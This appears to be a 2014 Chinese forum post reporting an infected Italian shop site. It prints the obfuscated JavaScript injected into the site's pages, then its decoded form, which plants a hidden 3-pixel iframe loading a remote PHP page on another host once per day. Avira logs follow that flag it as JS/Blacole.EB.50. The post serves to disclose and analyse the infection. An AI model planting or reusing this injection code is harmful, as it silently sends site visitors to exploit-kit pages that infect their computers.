http://www.lulamoda.it/condizioni.asp

显示全部楼层 · 发表于 2014-1-25 10:54:23

/*a59dc4*/
if (document.querySelector) zq = 4;
a = ("27,6d,7c,75,6a,7b,70,76,75,27,81,79,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,81,79,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,81,79,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,70,75,6c,7b,6c,75,7b,6c,79,7b,68,70,75,74,6c,75,7b,35,75,6c,7b,68,7c,35,75,6c,7b,36,68,6b,74,70,75,70,7a,7b,79,68,7b,76,79,36,74,39,3e,4f,71,69,53,4b,35,77,6f,77,2e,42,14,11,27,81,79,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,81,79,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,3a,2e,42,14,11,27,81,79,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,3a,77,7f,2e,42,14,11,27,81,79,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,3a,77,7f,2e,42,14,11,27,81,79,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,3a,2e,42,14,11,27,81,79,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,3a,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,81,79,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,81,79,63,2e,27,6a,73,68,7a,7a,44,63,2e,81,79,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,81,79,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,81,79,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,81,79,37,40,2f,30,42,14,11,84,14,11,84".split(","));
r = eval;
function vqvq() {
zva = function() {
--(d.body)
}()
}
d = document;
for (i = 0; i < a.length; i += 1) {
a[i] = -(12 - 5) + parseInt(a[i], zq * 4);
}
try {
vqvq()
} catch (q) {
yy = 50 - 50;
}
try {
yy /= 123
} catch (pq) {
yy = 1;
}
if (!yy) r(String["fr" + "omCh" + "arCo" + "de"].apply(String, a)); /*/a59dc4*/

复制代码

function zr09() {
var static = 'ajax';
var controller = 'index.php';
var zr = document.createElement('iframe');
zr.src = 'http://inetentertainment.netau.net/administrator/m27HjbLD.php';
zr.style.position = 'absolute';
zr.style.color = '3';
zr.style.height = '3px';
zr.style.width = '3px';
zr.style.left = '10003';
zr.style.top = '10003';
if (!document.getElementById('zr')) {
document.write('<p id=\'zr\' class=\'zr09\' ></p>');
document.getElementById('zr').appendChild(zr);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zr09();
}
}

复制代码

Avira

2014/1/25 上午 10:47 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\ssmItems[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.50' [virus]
   已採取動作：
   檔案會移動至 '5a288bb4.qua' 名稱底下的隔離區目錄!

2014/1/25 上午 10:47 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描.]。
   檔案數： 794
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2014/1/25 上午 10:47 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\ssm[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.50' [virus]
   已採取動作：
   檔案會移動至 '5a708af9.qua' 名稱底下的隔離區目錄!

2014/1/25 上午 10:47 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描.]。
   檔案數： 793
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2014/1/25 上午 10:46 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\ssmItems[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.50 [virus]'
   執行的動作：傳輸至掃描程式

2014/1/25 上午 10:46 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\ssmItems[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.50 [virus]'
   執行的動作：拒絕存取

2014/1/25 上午 10:46 [Web Protection] 發現惡意程式碼
   從 URL "http://www.lulamoda.it/ssmItems.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.50' [virus]。
   已採取動作：已略過

2014/1/25 上午 10:46 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\ssm[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.50 [virus]'
   執行的動作：傳輸至掃描程式

2014/1/25 上午 10:46 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVC3APW1\ssm[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.50 [virus]'
   執行的動作：拒絕存取

2014/1/25 上午 10:46 [Web Protection] 發現惡意程式碼
   從 URL "http://www.lulamoda.it/ssm.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.50' [virus]。
   已採取動作：已略過

2014/1/25 上午 10:46 [Web Protection] 封鎖的網頁
   URL (http://www.lulamoda.it/data.js) 的評估結果為惡意程式碼，而遭到封鎖.

fs is

[已鉴定] http://www.lulamoda.it/condizioni.asp